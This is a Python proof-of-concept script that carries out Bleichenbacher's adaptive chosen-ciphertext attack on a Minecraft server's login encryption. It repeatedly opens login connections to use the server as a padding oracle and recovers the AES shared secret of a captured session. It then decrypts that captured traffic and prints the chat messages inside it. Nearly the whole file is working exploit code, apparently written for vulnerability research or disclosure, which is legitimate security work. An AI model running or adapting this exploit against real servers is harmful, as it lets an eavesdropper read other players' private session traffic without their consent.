#!/usr/bin/env python3
# Needs PyCryptodome (RSA/AES) and PyYAML: pip3 install pycryptodome pyyaml

import ctypes
import io
import secrets
import struct
import sys
import time
import yaml
import zlib
from base64 import b64decode
from collections import deque
from random import randrange
from socket import socket

from Crypto.Cipher import PKCS1_v1_5, AES
from Crypto.Math.Numbers import Integer
from Crypto.PublicKey import RSA
from Crypto.Util.number import bytes_to_long, long_to_bytes, ceil_div
import Crypto.Util.number

# Username sent in the LoginStart packet of every connection opened by
# getKey() and oracle().
user = b'bleichenbacher'
# Number of oracle queries made so far; incremented by oracle() and reported
# by main() once the secret has been recovered.
counter = 0

def readVarInt(b, proc=lambda x: x.read(1), cipher=None):
    """Decode one Minecraft VarInt (32-bit, 7 bits per byte, LSB group first).

    Args:
        b: data source, handed to *proc*.
        proc: callable returning the next single byte from *b* as ``bytes``
            (empty at end of data). Defaults to ``b.read(1)`` for streams.
        cipher: optional object whose ``decrypt`` is applied to every byte
            as it is read (used for the encrypted stream).

    Returns:
        The value as a signed 32-bit int, so that anything produced by
        ``writeVarInt`` (which two's-complement encodes negatives) round-trips.
        ``None`` if the data ends mid-VarInt or the VarInt is longer than the
        5-byte maximum.
    """
    value = 0
    # A 32-bit VarInt occupies at most 5 bytes (5 * 7 = 35 >= 32 bits).
    for shift in range(0, 35, 7):
        byte = proc(b)
        if not byte:
            return None
        if cipher:
            byte = cipher.decrypt(byte)
        byte = byte[0]
        value |= (byte & 0x7f) << shift
        if not byte & 0x80:
            # Final byte: wrap to 32 bits and reinterpret as two's complement.
            value &= 0xFFFFFFFF
            return value - (1 << 32) if value & 0x80000000 else value
    # Continuation bit still set after 5 bytes: overlong / malformed VarInt.
    return None

def recvVarInt(b):
    """Read one VarInt straight off socket *b*, one ``recv(1)`` per byte."""
    def recv_one(sock):
        return sock.recv(1)

    return readVarInt(b, recv_one)

def writeVarInt(i):
    """Encode *i* as a Minecraft VarInt.

    The value is first reduced to 32 bits, so negative numbers are written in
    two's complement (always 5 bytes), as the protocol's signed VarInt
    requires. An explicit mask is used instead of ``ctypes.c_uint``, whose
    width is platform-dependent.
    """
    value = i & 0xFFFFFFFF
    out = bytearray()
    while True:
        group = value & 0x7f
        value >>= 7
        if value:
            # More groups follow: set the continuation bit.
            out.append(group | 0x80)
        else:
            out.append(group)
            return bytes(out)

def writeString(s):
    """Prefix byte string *s* with its length as a VarInt."""
    prefix = writeVarInt(len(s))
    return prefix + s

def readString(b):
    """Read a VarInt-length-prefixed byte string from stream *b*.

    Returns ``b''`` when the length prefix is missing/malformed (``None``) or
    negative. Passing such a value to ``b.read`` would instead silently return
    the entire remainder of the stream. Like ``b.read``, the result may be
    shorter than the declared length if the stream ends early.
    """
    length = readVarInt(b)
    if length is None or length < 0:
        return b''
    return b.read(length)

def createPacket(packet_id, data):
    """Frame an uncompressed packet: VarInt(total length) + VarInt(id) + data."""
    body = b''.join((writeVarInt(packet_id), data))
    return b''.join((writeVarInt(len(body)), body))

def recvPacket(sock):
    """Receive one uncompressed, unencrypted packet from *sock*.

    Returns:
        ``(packet_id, body)``, where *body* is a BytesIO positioned just after
        the packet id. If no usable length prefix arrived (EOF, malformed,
        zero or negative), returns ``(-1, BytesIO(b''))`` instead. If the peer
        closes mid-packet, the bytes received so far are returned.
    """
    length = recvVarInt(sock)
    if not length or length < 0:
        return (-1, io.BytesIO(b''))

    # recv() may return fewer bytes than asked for, so keep reading (at most
    # 0x1000 per call) until the whole packet, or EOF, has arrived.
    chunks = []
    remaining = length
    while remaining > 0:
        chunk = sock.recv(min(remaining, 0x1000))
        if not chunk:
            break
        chunks.append(chunk)
        remaining -= len(chunk)

    data = io.BytesIO(b''.join(chunks))
    return (readVarInt(data), data)

def readPacket(b, ct=-1, cipher=None):
    """Read one framed packet from stream *b*.

    Args:
        b: stream holding the (possibly encrypted) packet bytes.
        ct: compression threshold. Any value > -1 means the compressed
            packet format is in use: a VarInt uncompressed size follows the
            length, and a non-zero size means the rest is zlib data.
        cipher: optional stream cipher used to decrypt both the length
            prefix and the packet body.

    Returns:
        ``(packet_id, body)`` with *body* positioned after the id, or
        ``(-1, BytesIO(b''))`` when no non-zero length prefix is available.
    """
    # readVarInt applies the cipher only when it is truthy, exactly as the
    # caller-side check would.
    length = readVarInt(b, cipher=cipher)
    if not length:
        return (-1, io.BytesIO(b''))

    raw = b.read(length)
    payload = io.BytesIO(cipher.decrypt(raw) if cipher else raw)

    if ct > -1:
        uncompressed_size = readVarInt(payload)
        if uncompressed_size > 0:
            inflated = zlib.decompressobj().decompress(payload.read())
            assert len(inflated) == uncompressed_size
            payload = io.BytesIO(inflated)

    return (readVarInt(payload), payload)

def cHandshake(version, addr, port, next_state):
    """Build a Handshake packet (id 0x00).

    Fields: VarInt protocol version, string server address (bytes),
    big-endian unsigned short port, VarInt next state.
    """
    payload = b''.join([
        writeVarInt(version),
        writeString(addr),
        struct.pack('!H', port),
        writeVarInt(next_state),
    ])
    return createPacket(0x00, payload)

def cRequest():
    """Build an empty status Request packet (id 0x00)."""
    return createPacket(0, bytes())

def cPing(long):
    """Build a Ping packet (id 0x01) carrying *long* as a big-endian int64."""
    payload = struct.pack('!q', long)
    return createPacket(0x01, payload)

def cLoginStart(username):
    """Build a LoginStart packet (id 0x00) for the byte-string *username*."""
    name_field = writeString(username)
    return createPacket(0x00, name_field)

def cEncryptionResponse(secret, vt):
    """Build an Encryption Response packet (id 0x01).

    *secret* and *vt* are written verbatim as length-prefixed byte strings;
    callers pass them already RSA-encrypted.
    """
    fields = b''.join((writeString(secret), writeString(vt)))
    return createPacket(0x01, fields)

def sEncryptionRequest(data):
    """Parse the body of a server Encryption Request packet.

    The body is three VarInt-length-prefixed byte strings: server id, public
    key, verify token. All three are read with ``readString`` for
    consistency.

    Returns:
        ``(pk, vt)`` -- the public-key bytes (later passed to
        ``RSA.importKey``) and the verify token.
    """
    readString(data)  # server id: unused, but must be consumed
    pk = readString(data)
    vt = readString(data)
    return pk, vt

def getKey(addr, port):
    """Fetch the server's RSA public key via a throwaway login attempt.

    Sends Handshake (protocol 753, next state 2) and LoginStart, then parses
    the Encryption Request reply. After that the connection is closed.

    Returns:
        ``(key, cipher)`` -- the imported RSA public key and a PKCS#1 v1.5
        cipher object built from it.
    """
    # The context manager closes the socket even if parsing fails.
    with socket() as sock:
        sock.connect((addr, port))
        # sendall: a bare send() may transmit only part of the buffer.
        sock.sendall(cHandshake(753, addr, port, 0x02))
        sock.sendall(cLoginStart(user))
        pk, _ = sEncryptionRequest(recvPacket(sock)[1])

    key = RSA.importKey(pk)
    cipher = PKCS1_v1_5.new(key)
    return key, cipher

def splitter(packets, pred):
    """Partition *packets* into ``(matching, non_matching)`` lists, keeping order."""
    buckets = {True: [], False: []}
    for item in packets:
        buckets[bool(pred(item))].append(item)
    return (buckets[True], buckets[False])

def interval(a, b):
    """Return the closed integer range [a, b] (empty when b < a)."""
    upper = b + 1
    return range(a, upper)

def ceildiv(a, b):
    """Exact integer ceiling of a / b (no float rounding for big ints)."""
    quotient, remainder = divmod(a, b)
    # divmod floors; bump by one whenever the division was not exact.
    return quotient + (remainder != 0)

def floordiv(a, b):
    """Exact integer floor of a / b."""
    quotient, _ = divmod(a, b)
    return quotient

def bleichenbacher(addr, port, ciphertext):
    """Recover the PKCS#1 v1.5 plaintext of *ciphertext* with Bleichenbacher's attack.

    Follows the steps of Bleichenbacher's adaptive chosen-ciphertext attack
    (CRYPTO '98). Blinded ciphertexts c * s^e mod n are submitted through
    ``oracle``. Every s that the oracle accepts narrows the set of intervals
    known to contain the plaintext m, until one value remains.

    Args:
        addr: server host, passed through to ``socket.connect``.
        port: server TCP port.
        ciphertext: RSA ciphertext bytes (big-endian) to decrypt.

    Returns:
        The full padded plaintext block m as an int, or ``None`` if the set
        of candidate intervals becomes empty.

    Side effects: prints progress to stdout. Every oracle query opens a new
    server connection and increments the module-level ``counter``.
    """
    key, cipher = getKey(addr, port)

    c = Integer(PKCS1_v1_5.bytes_to_long(ciphertext))
    k = key.size_in_bytes()
    n = int(key.n)

    # A conforming block starts 0x00 0x02, so 2B <= m < 3B.
    B = pow(2, 8 * (k - 2))
    B2 = 2 * B
    B3 = B2 + B

    # Step 1 with s0 = 1 (no blinding): c is assumed conforming already, so m
    # starts in the single interval [2B, 3B - 1].
    m_old = {(B2, B3 - 1)}
    i = 1

    # Progress display only: total interval width expressed as "bits known"
    # out of a hard-coded 1024 (i.e. it assumes a 1024-bit modulus).
    search_space = 0
    for a, b in m_old:
        search_space += b - a
    entropy = 1024 - search_space.bit_length()
    print('\rCalculated %d/1024 bits...' % entropy, end='')

    s_old = 0
    while True:
        if i == 1:
            # Step 2a: smallest s >= n / 3B that the oracle accepts.
            s_new = ceildiv(n, B3)
            while not oracle(addr, port, key, cipher, c, s_new, k):
                s_new += 1

        elif i > 1 and len(m_old) >= 2:
            # Step 2b: several candidate intervals -> linear search upward
            # from the previous s.
            s_new = s_old + 1
            while not oracle(addr, port, key, cipher, c, s_new, k):
                s_new += 1

        elif len(m_old) == 1:
            # Step 2c: single interval [a, b] -> for r starting at
            # ceil(2 * (b * s_old - 2B) / n), try every s in
            # [ceil((2B + r*n) / b), floor((3B - 1 + r*n) / a)].
            a, b = next(iter(m_old))
            found = False
            r = ceildiv(2 * (b * s_old - B2), n)
            while not found:
                for s in interval(ceildiv(B2 + r * n, b), floordiv(B3 - 1 + r * n, a)):
                    if oracle(addr, port, key, cipher, c, s, k):
                        found = True
                        s_new = s
                        break
                r += 1

        # Step 3: narrow every interval [a, b] with the new s. For each r in
        # [ceil((a*s - 3B + 1) / n), floor((b*s - 2B) / n)] keep
        # [max(a, ceil((2B + r*n) / s)), min(b, floor((3B - 1 + r*n) / s))].
        # NOTE(review): overlapping results are stored as separate set entries
        # rather than merged into their union, which may keep len(m_new) >= 2
        # (taking Step 2b instead of 2c) longer than necessary.
        m_new = set()
        for a, b in m_old:
            r_min = ceildiv(a * s_new - B3 + 1, n)
            r_max = floordiv(b * s_new - B2, n)
            for r in interval(r_min, r_max):
                new_lb = max(a, ceildiv(B2 + r * n, s_new))
                new_ub = min(b, floordiv(B3 - 1 + r * n, s_new))
                if new_lb <= new_ub:
                    m_new |= {(new_lb, new_ub)}

        search_space = 0
        for a,b in m_new:
            search_space += b - a
        entropy = 1024 - search_space.bit_length()
        print('\rCalculated %d/1024 bits...' % entropy, end='')

        if len(m_new) == 0:
            # No interval survived; presumably an inconsistent oracle answer.
            print()
            return None
        elif len(m_new) == 1:
            a, b = next(iter(m_new))
            if a == b:
                # Step 4: the interval collapsed to one value. With s0 = 1,
                # that value is m itself.
                print()
                return a

        i += 1
        s_old = s_new
        m_old = m_new

def oracle(addr, port, key, cipher, c, s, k):
    """Submit the blinded ciphertext c * s^e mod n and classify the reply.

    Opens a fresh login connection and sends ``c * s^e mod n`` (as a k-byte
    string) as the encrypted shared secret. It is sent together with the
    server's verify token, encrypted under the server key. The first reply
    packet is then inspected.

    Returns:
        ``True`` unless the reply body is exactly the "Missing argument"
        disconnect message, which this PoC treats as the non-conforming
        answer. NOTE(review): this presumably depends on the server emitting
        that exception for a bad padding check; confirm for the server version
        under test.

    Side effects: increments the module-level ``counter``.
    """
    global counter

    # The context manager closes the socket on every path; sendall avoids
    # partial writes.
    with socket() as sock:
        sock.connect((addr, port))

        sock.sendall(cHandshake(753, addr, port, 0x02))
        sock.sendall(cLoginStart(user))
        _, vt = sEncryptionRequest(recvPacket(sock)[1])

        c_prime = PKCS1_v1_5.long_to_bytes(c * pow(Integer(s), key.e, key.n) % key.n, k)
        verify_token = cipher.encrypt(vt)

        counter += 1
        sock.sendall(cEncryptionResponse(c_prime, verify_token))
        _, p = recvPacket(sock)

    return p.read() != b'|{"translate":"disconnect.genericReason","with":["Internal Exception: java.lang.IllegalArgumentException: Missing argument"]}'

def main():
    """Decrypt a captured Minecraft session, recovering the shared secret if needed.

    Usage: ``./poc.py packet_file [key]``

    ``packet_file`` is a YAML mapping loaded with ``yaml.safe_load``. Entries
    whose keys start with ``peer0`` are client-to-server chunks; all other
    entries are server-to-client. Values must be bytes (they are joined with
    ``b''.join``) and appear in capture order.

    ``key`` is an optional hex string giving the 16-byte shared secret.
    Without it, the secret is recovered by running ``bleichenbacher`` against
    the hard-coded server 127.0.0.1:25565.

    Chat packets are printed; every other packet is only counted.
    """
    if len(sys.argv) == 1:
        print('Usage: ./poc.py packet_file [key]')
        return

    # safe_load (never yaml.load): the capture file is external input.
    with open(sys.argv[1]) as capture:
        packets = yaml.safe_load(capture).items()
    # Reassemble each direction into one contiguous byte stream.
    client, server = splitter(packets, lambda x: x[0].startswith('peer0'))
    client = io.BytesIO(b''.join(map(lambda x: x[1], client)))
    server = io.BytesIO(b''.join(map(lambda x: x[1], server)))

    readPacket(client) # cHandshake
    packet_id, client_hello = readPacket(client) # cLoginStart
    client_username = readString(client_hello).decode('utf-8')
    assert packet_id == 0x00

    readPacket(server) # sEncryptionRequest
    packet_id, encrypt_response = readPacket(client) # cEncryptionResponse
    assert packet_id == 0x01

    if len(sys.argv) > 2:
        # blocksize=16 left-pads with 0x00: a secret whose first byte(s) are
        # zero must still produce a 16-byte AES key, not a shorter one.
        key = long_to_bytes(int(sys.argv[2], 16), 16)
    else:
        ciphertext = readString(encrypt_response)
        verify_token = readString(encrypt_response)

        assert len(ciphertext) == 128
        assert len(verify_token) == 128

        # TODO: Switch to argv/argparser
        addr = b'127.0.0.1'
        port = 25565

        print('Breaking shared secret... (this may take a while!)')
        t = time.monotonic()
        m = bleichenbacher(addr, port, ciphertext)
        if not m:
            print("Failed to break secret.")
            return

        # Our secret key is the last 16 bytes of m
        key = long_to_bytes(m)[-16:]
        print('Found secret in %d seconds (%d calls to oracle)' % (time.monotonic() - t, counter))

    print('Using secret: 0x%s' % key.hex())
    print('Decrypting packets for %s:' % client_username)

    decrypted, chat, hidden = 0, 0, 0
    ct = -1
    # The same secret serves as both key and IV; each direction keeps its own
    # cipher state.
    client_cipher = AES.new(key, iv=key, mode=AES.MODE_CFB)
    server_cipher = AES.new(key, iv=key, mode=AES.MODE_CFB)
    # NOTE(review): this reads exactly one protocol packet per captured chunk,
    # including chunks whose packets were already consumed above. It
    # therefore assumes one packet per chunk; extra reads at end of stream
    # come back as id -1 and are counted as "not shown".
    for peer, _ in packets:
        if peer.startswith('peer0'): # client
            packet_id, p = readPacket(client, ct=ct, cipher=client_cipher)
        else: # server
            packet_id, p = readPacket(server, ct=ct, cipher=server_cipher)

        if peer.startswith('peer0'):
            if packet_id == 0x03: # cChatMessage
                chat_msg = readString(p).decode('utf-8')
                print('%s> %s' % (client_username, chat_msg))
                chat += 1
            else:
                hidden += 1
        else:
            # NOTE(review): id 0x03 is treated as sSetCompression in every
            # state; confirm no later clientbound 0x03 packet can reset ct.
            if packet_id == 0x03: # sSetCompression
                ct = readVarInt(p)
            elif packet_id == 0x0e: # sChatMessage
                print(readString(p).decode('utf-8'))
                chat += 1
            else:
                hidden += 1
        decrypted += 1

    print('Decrypted %d packets (%d chat, %d not shown)' % (decrypted, chat, hidden))

# Run the PoC only when executed as a script, not when imported.
if __name__ == '__main__':
    main()
